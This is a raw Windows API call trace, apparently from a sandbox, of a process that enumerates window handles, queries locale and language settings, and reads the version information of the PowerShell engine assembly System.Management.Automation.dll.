	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xc0
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x688
	[0131.066] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x6c0
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x408
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7d4
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x544
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x540
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x71c
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x31c
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7ec
	[0131.067] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5b8
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x754
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x664
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x640
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x700
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x410
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7a0
	[0131.068] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x3b4
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5cc
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5d4
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7c0
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x364
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x240
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x560
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x57c
	[0131.069] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7b0
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x6a4
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x32c
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x670
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f0
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x514
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x50c
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x514
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x50c
	[0131.070] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x514
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f0
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f0
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x58c
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x578
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x530
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.071] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x508
	[0131.072] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.072] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f4
	[0131.164] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.164] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.164] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x794
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x448
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x778
	[0131.165] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x538
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4ac
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x938
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7c8
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xbdc
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xbe0
	[0131.166] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9f4
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x964
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9e8
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9e8
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xb40
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xa00
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9f0
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9e0
	[0131.167] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9d0
	[0131.168] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9c0
	[0131.168] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9b0
	[0131.168] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x9a0
	[0131.168] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x990
	[0131.168] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x980
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x970
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x960
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x950
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x940
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x930
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x920
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x910
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x900
	[0131.171] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8f0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8e0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8d0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8c0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8b0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x8a0
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x890
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x880
	[0131.172] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x870
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x860
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x850
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x840
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x830
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x820
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x810
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x20c
	[0131.173] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7c4
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0xc0
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x688
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x6c0
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x408
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7d4
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x544
	[0131.174] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x540
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x71c
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x31c
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7ec
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5b8
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x754
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x664
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x640
	[0131.175] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x700
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x410
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7a0
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x3b4
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5cc
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x5d4
	[0131.176] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7c0
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x364
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x240
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x560
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x57c
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x7b0
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x6a4
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x32c
	[0131.177] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x670
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x50c
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x514
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f0
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x58c
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x4f4
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x794
	[0131.178] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x458
	[0131.179] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x14d8a0 | out: lpdwProcessId=0x14d8a0) returned 0x778
	[0131.184] WerSetFlags () returned 0x0
	[0131.195] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0131.195] CoTaskMemFree (pv=0x0) 
	[0131.196] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dc00 | out: pulNumLanguages=0x14dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dc00) returned 1
	[0131.196] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dc08, pwszLanguagesBuffer=0x2d578b8, pcchLanguagesBuffer=0x14dc00 | out: pulNumLanguages=0x14dc08, pwszLanguagesBuffer=0x2d578b8, pcchLanguagesBuffer=0x14dc00) returned 1
	[0131.204] CoTaskMemAlloc (cb=0x24) returned 0x25e430
	[0131.204] GetUserDefaultLocaleName (in: lpLocaleName=0x25e430, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0131.205] CoTaskMemFree (pv=0x25e430) 
	[0131.331] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.332] CoTaskMemFree (pv=0x1b7a3d10) 
	[0131.335] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.335] CoTaskMemFree (pv=0x1b7a3d10) 
	[0131.494] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.494] CoTaskMemFree (pv=0x1b7a3d10) 
	[0131.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.605] SetErrorMode (uMode=0x1) returned 0x1
	[0131.606] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d880 | out: lpFileInformation=0x14d880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0131.606] SetErrorMode (uMode=0x1) returned 0x1
	[0131.606] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14daf0 | out: lpdwHandle=0x14daf0) returned 0x94c
	[0131.607] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d5b148 | out: lpData=0x2d5b148) returned 1
	[0131.609] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14da68, puLen=0x14da60 | out: lplpBuffer=0x14da68*=0x2d5b1e4, puLen=0x14da60) returned 1
	[0131.609] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b2c0, puLen=0x14d9d0) returned 1
	[0131.609] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0131.609] CoTaskMemAlloc (cb=0x2e) returned 0x1b7a2940
	[0131.609] lstrcpyW (in: lpString1=0x1b7a2940, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0131.609] CoTaskMemFree (pv=0x1b7a2940) 
	[0131.609] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b314, puLen=0x14d9d0) returned 1
	[0131.609] lstrlenW (lpString="System.Management.Automation") returned 28
	[0131.609] CoTaskMemAlloc (cb=0x3c) returned 0x1b7a5d10
	[0131.609] lstrcpyW (in: lpString1=0x1b7a5d10, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0131.609] CoTaskMemFree (pv=0x1b7a5d10) 
	[0131.610] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b370, puLen=0x14d9d0) returned 1
	[0131.610] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.610] CoTaskMemAlloc (cb=0x20) returned 0x25e490
	[0131.610] lstrcpyW (in: lpString1=0x25e490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.610] CoTaskMemFree (pv=0x25e490) 
	[0131.610] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b3b0, puLen=0x14d9d0) returned 1
	[0131.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.610] CoTaskMemAlloc (cb=0x44) returned 0x1b7a5d10
	[0131.610] lstrcpyW (in: lpString1=0x1b7a5d10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.610] CoTaskMemFree (pv=0x1b7a5d10) 
	[0131.610] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b418, puLen=0x14d9d0) returned 1
	[0131.610] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0131.610] CoTaskMemAlloc (cb=0x76) returned 0x1d39b0
	[0131.610] lstrcpyW (in: lpString1=0x1d39b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0131.610] CoTaskMemFree (pv=0x1d39b0) 
	[0131.610] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b4b4, puLen=0x14d9d0) returned 1
	[0131.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.610] CoTaskMemAlloc (cb=0x44) returned 0x1b7a5d10
